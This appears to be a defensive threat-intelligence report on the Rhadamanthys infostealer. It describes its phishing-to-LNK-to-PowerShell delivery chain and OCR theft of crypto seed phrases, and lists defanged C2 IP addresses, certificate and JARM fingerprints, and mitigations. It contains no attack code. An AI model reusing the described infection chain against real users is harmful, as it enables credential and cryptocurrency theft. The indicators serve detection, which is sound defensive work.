Full Report
Hunting Rhadamanthys Infrastructure in the 2024 Holiday Season
Analysis Summary
# Threat Actor: Rhadamanthys
## Attribution & Identity
The threat actor is associated with the deployment and continuous updating of the **Rhadamanthys infostealer**. No specific nation-state or established group is explicitly named or attributed in the context, only the malware/operation name itself.
## Activity Summary
The actor is currently engaged in deploying infostealer campaigns, particularly focusing on the 2024 holiday season. These campaigns leverage social engineering tactics, often distributing malicious payloads via phishing emails attached with files (e.g., malicious PDF files reported to contain the stealer). The actor demonstrates sophistication through rapid iteration, with the latest version (0.7.0) released in June 2024.
## Tactics, Techniques & Procedures
- **Delivery Mechanism:** Phishing emails containing password-protected ZIP files.
- **Initial Execution:** The ZIP archives contain LNK files which execute malicious PowerShell scripts.
- **Payload Retrieval:** The PowerShell script downloads the Rhadamanthys stealer directly into memory.
- **Malware Evolution:** Rapid iterations, incorporating advanced features.
- **Data Exfiltration Focus:** Specifically designed to extract cryptocurrency wallet seed phrases from images using AI-powered Optical Character Recognition (OCR).
- **Infrastructure Analysis TTPs (Used by Analyst, indicative of Actor's C2 structure):** Use of servers running Microsoft IIS 8.0/Windows Server 2012 and identified via unique certificate fingerprints and JARM fingerprints.
## Targeting
- **Sectors:** Travel and shopping platforms are explicitly exploited for initial access (social engineering focus). The malware's capability to steal crypto seed phrases suggests targeting individuals or entities managing digital assets.
- **Geography:** Not explicitly detailed, though the infrastructure analysis touches on global IP space.
- **Victims:** General targets within compromised sectors; no specific named organizations mentioned.
## Tools & Infrastructure
- **Malware families used:** Rhadamanthys infostealer (versions up to 0.7.0).
- **Infrastructure (C2, domains, IPs - defang URLs):**
- Identified in association with Port 7257 (HTTP) services using Microsoft IIS 8.0 banners.
- Infrastructure identified via SHA-256 certificate hash: `9eb7407fb6363c4d2a191afb9c5ed8cb16c41a68a87d60fa7dc6294f6b2c4892`.
- Infrastructure utilizing specific JARM fingerprint, OpenSSH 8.0, Port 22, and identified as running on Windows Server 2012.
- **IOCs (IPs):**
- Services Banner IOCs: 88[.]210.12.126, 103[.]148.58.151, 104[.]37.175.232, 185[.]234.216.132, 154[.]216.19.192, 193[.]124.205.63, 103[.]148.58.152, 45[.]200.149.186, 179[.]61.251.153, 38[.]55.97.42, 45[.]155.220.96, 45[.]200.149.72, 185[.]196.8.68, 185[.]196.8.56.
- Services Certificate IOCs: 185[.]196.10.135, 185[.]196.8.68, 185[.]196.8.76, 185[.]196.11.18.
- JARM IOCs: 185.209.162[.]23, 223.68.141[.]147, 8.134.34[.]5, 39.101.197[.]84.
## Implications
The actor presents a significant, evolving threat due to the high development speed of Rhadamanthys. The inclusion of AI-powered OCR specifically targeting cryptocurrency seed phrases indicates a high-value objective focused on financial theft, making this actor a key threat in the cryptocurrency ecosystem during periods of heightened online activity (like the holiday season). The use of legacy OS versions (Windows Server 2012) in infrastructure suggests either an attempt to run stable, older environments or an environment poorly maintained/hardened.
## Mitigations
- Enhance phishing detection and train users globally on recognizing social engineering attempts, especially those using trusted holiday/shopping themes.
- Implement advanced email filtering to block malicious ZIP attachments and LNK files.
- Deploy memory scanning and endpoint detection and response (EDR) capable of detecting fileless execution stemming from PowerShell invoking suspicious payloads.
- For crypto users, avoid storing seed phrases or wallet backups digitally, especially on systems subject to web browsing or email interaction.
- Network segmentation and monitoring should focus on identifying anomalous outbound connections to newly provisioned or low-reputation IPs matching the identified C2 infrastructure patterns (IIS 8.0, specific Cert/JARM hashes).